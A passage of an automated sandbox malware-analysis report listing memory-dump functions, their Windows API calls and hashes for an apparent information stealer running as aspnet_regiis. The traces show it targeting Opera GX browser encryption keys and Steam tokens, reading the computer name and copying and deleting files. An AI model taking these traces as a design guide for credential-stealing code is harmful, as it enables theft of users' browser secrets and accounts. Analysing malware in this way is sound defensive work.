                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4198075804-0
                                                                                                                                                                              • Opcode ID: d22b94ad04d38b2d2026065e1d3dd6c3e7b0531b2147025ae2452d2d7d1e12d8
                                                                                                                                                                              • Instruction ID: a0ed6a66ea63ec81cdb2171b2b6e6751aef9ae6485664d9142e90c5ebcf2ec4e
                                                                                                                                                                              • Opcode Fuzzy Hash: d22b94ad04d38b2d2026065e1d3dd6c3e7b0531b2147025ae2452d2d7d1e12d8
                                                                                                                                                                              • Instruction Fuzzy Hash: 64211972880228ABCF00EF95E9849DE7BB9FF44764F004526FD05A7140DB30EA96CFA0
                                                                                                                                                                              Function 02A12446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,02A14A8D), ref: 02A12460
                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,02A14A8D,02A14A8D,00000000,?,?,?,02A14A8D), ref: 02A12487
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,02A14A8D), ref: 02A1249E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1065093856-0
                                                                                                                                                                              • Opcode ID: 4bfadd988d49bc73fc0c68d39c14c4ab82baeed85cb61d1460a5a09d97dc2b26
                                                                                                                                                                              • Instruction ID: 67f4a35775c2223108856dd34af590bf740d74cf17fa42c9570ddda881fb3d8b
                                                                                                                                                                              • Opcode Fuzzy Hash: 4bfadd988d49bc73fc0c68d39c14c4ab82baeed85cb61d1460a5a09d97dc2b26
                                                                                                                                                                              • Instruction Fuzzy Hash: CBF09071581228BFEB016FA4EC8AFEB376DDB093A4F004510FD91A6190DB20DD915BA0
                                                                                                                                                                              Function 02A1224A Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,02A13DEA,00000000,?), ref: 02A1226C
                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 02A12287
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02A1228E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                              • Opcode ID: 401744d12d39a34549b27ada1d507abfd27d6144d9bda0a680615195808c3aac
                                                                                                                                                                              • Instruction ID: 5ff1abaf3196fe209767f15ec2c9d16614f5c5cfd681d852f2097ef8a087712f
                                                                                                                                                                              • Opcode Fuzzy Hash: 401744d12d39a34549b27ada1d507abfd27d6144d9bda0a680615195808c3aac
                                                                                                                                                                              • Instruction Fuzzy Hash: FCF09071A40218ABD720AB689C45FEEB7B89B48B14F400559F545E7180DEB4DAC58B51
                                                                                                                                                                              Function 6CA63060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CA63095
                                                                                                                                                                                • Part of subcall function 6CA635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CAEF688,00001000), ref: 6CA635D5
                                                                                                                                                                                • Part of subcall function 6CA635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CA635E0
                                                                                                                                                                                • Part of subcall function 6CA635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CA635FD
                                                                                                                                                                                • Part of subcall function 6CA635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CA6363F
                                                                                                                                                                                • Part of subcall function 6CA635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CA6369F
                                                                                                                                                                                • Part of subcall function 6CA635A0: __aulldiv.LIBCMT ref: 6CA636E4
                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA6309F
                                                                                                                                                                                • Part of subcall function 6CA85B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CA856EE,?,00000001), ref: 6CA85B85
                                                                                                                                                                                • Part of subcall function 6CA85B50: EnterCriticalSection.KERNEL32(6CAEF688,?,?,?,6CA856EE,?,00000001), ref: 6CA85B90
                                                                                                                                                                                • Part of subcall function 6CA85B50: LeaveCriticalSection.KERNEL32(6CAEF688,?,?,?,6CA856EE,?,00000001), ref: 6CA85BD8
                                                                                                                                                                                • Part of subcall function 6CA85B50: GetTickCount64.KERNEL32 ref: 6CA85BE4
                                                                                                                                                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CA630BE
                                                                                                                                                                                • Part of subcall function 6CA630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CA63127
                                                                                                                                                                                • Part of subcall function 6CA630F0: __aulldiv.LIBCMT ref: 6CA63140
                                                                                                                                                                                • Part of subcall function 6CA9AB2A: __onexit.LIBCMT ref: 6CA9AB30
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680275252.000000006CA60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680422208.000000006CAEE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680459198.000000006CAF2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6ca60000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291168024-0
                                                                                                                                                                              • Opcode ID: b79cb101c36b8a197d1dee50a0add366d2fcd26a98b94a140f52ff4ca2ee75a2
                                                                                                                                                                              • Instruction ID: 60da254845b9ac99213f61e0fa9a42f7442cc646b7da1ff88a05b4a8badca038
                                                                                                                                                                              • Opcode Fuzzy Hash: b79cb101c36b8a197d1dee50a0add366d2fcd26a98b94a140f52ff4ca2ee75a2
                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0D612E2178597CB54DF34AD411EA7370EFAF214F11971EE88557511FB2062DD93C2
                                                                                                                                                                              Function 02A10C85 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateComputerNameProcess
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1664310425-0
                                                                                                                                                                              • Opcode ID: 2d24dc168d07f27ed9ede325317e630f6012b610bd0cb4b9e56d2295fc46ec42
                                                                                                                                                                              • Instruction ID: 78e94ace7c710e1a4b13ca34467cf83645e1c055c1b6c8bfedf6109659b508ea
                                                                                                                                                                              • Opcode Fuzzy Hash: 2d24dc168d07f27ed9ede325317e630f6012b610bd0cb4b9e56d2295fc46ec42
                                                                                                                                                                              • Instruction Fuzzy Hash: 9AE08CB1A40204BBD7409B9A9C8DF8A76ACDB81B15F000415FA05D6240EEB0C9498B20
                                                                                                                                                                              Function 02A0C95C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,Opera GX,02A36853,02A3684B,?,?,?), ref: 02A0C98F
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A0819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,02A0CC90,?,?), ref: 02A081E5
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                                                                                                              • String ID: Opera GX
                                                                                                                                                                              • API String ID: 1719890681-3280151751
                                                                                                                                                                              • Opcode ID: 13e1074ab039a568775bc974d73d26c80a083a1b551b70f767573aa7d43cf0d5
                                                                                                                                                                              • Instruction ID: 6b3d469e41386fe761e331b68c4f6e8fb981e527d8b6532c8666f7db15db3d7c
                                                                                                                                                                              • Opcode Fuzzy Hash: 13e1074ab039a568775bc974d73d26c80a083a1b551b70f767573aa7d43cf0d5
                                                                                                                                                                              • Instruction Fuzzy Hash: A8B1E532D8011DABDF11FBA4EE82ACDB776AF04364F514125ED0477160DE34AE5A8FA1
                                                                                                                                                                              Function 02A07B0B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,02A07C56,?), ref: 02A07B8A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 544645111-3916222277
                                                                                                                                                                              • Opcode ID: 594d4613f92cc503b7c2d315449fab607d97e606ebf9ec2f1411b1b53eb0407b
                                                                                                                                                                              • Instruction ID: f363f4e9063da3bfc41d0c6721ca0c2734793a8ee34ff721580d18ccdc2d3898
                                                                                                                                                                              • Opcode Fuzzy Hash: 594d4613f92cc503b7c2d315449fab607d97e606ebf9ec2f1411b1b53eb0407b
                                                                                                                                                                              • Instruction Fuzzy Hash: F8115871500609ABDB20DF94A9C4BA9F7E4FB06388F544455D742D72C0DB78BA84DB60
                                                                                                                                                                              Function 02A16FB7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 45stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16FFE
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              • Soft\Steam\steam_tokens.txt, xrefs: 02A1700E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                                                                                                              • String ID: Soft\Steam\steam_tokens.txt
                                                                                                                                                                              • API String ID: 502913869-3507145866
                                                                                                                                                                              • Opcode ID: 4794c19233698851413d819c9248f215a9d7af5f2b370d4421b42dd564902f2b
                                                                                                                                                                              • Instruction ID: eee7f88d321a7964fdda9e58acbd481fd8f1836d97f67324864bdabb8449a7af
                                                                                                                                                                              • Opcode Fuzzy Hash: 4794c19233698851413d819c9248f215a9d7af5f2b370d4421b42dd564902f2b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F012131D80118ABCF01BBE5EE868CE7B7AAF04364B504161EE00B7150DF30AA5A8ED1
                                                                                                                                                                              Function 02A16330 Relevance: 2.6, APIs: 2, Instructions: 101stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A16378
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A16396
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16018
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindFirstFileA.KERNEL32(?,?), ref: 02A1602F
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB4), ref: 02A16050
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36AB8), ref: 02A1606A
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A16091
                                                                                                                                                                                • Part of subcall function 02A15FD1: StrCmpCA.SHLWAPI(?,02A36647), ref: 02A160A5
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160C2
                                                                                                                                                                                • Part of subcall function 02A15FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 02A160EF
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?), ref: 02A16125
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD0), ref: 02A16137
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A1614A
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,02A36AD4), ref: 02A1615C
                                                                                                                                                                                • Part of subcall function 02A15FD1: lstrcat.KERNEL32(?,?), ref: 02A16170
                                                                                                                                                                                • Part of subcall function 02A15FD1: wsprintfA.USER32 ref: 02A160D9
                                                                                                                                                                                • Part of subcall function 02A15FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 02A16229
                                                                                                                                                                                • Part of subcall function 02A15FD1: DeleteFileA.KERNEL32(?), ref: 02A1629D
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindNextFileA.KERNEL32(?,?), ref: 02A162FF
                                                                                                                                                                                • Part of subcall function 02A15FD1: FindClose.KERNEL32(?), ref: 02A16313
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
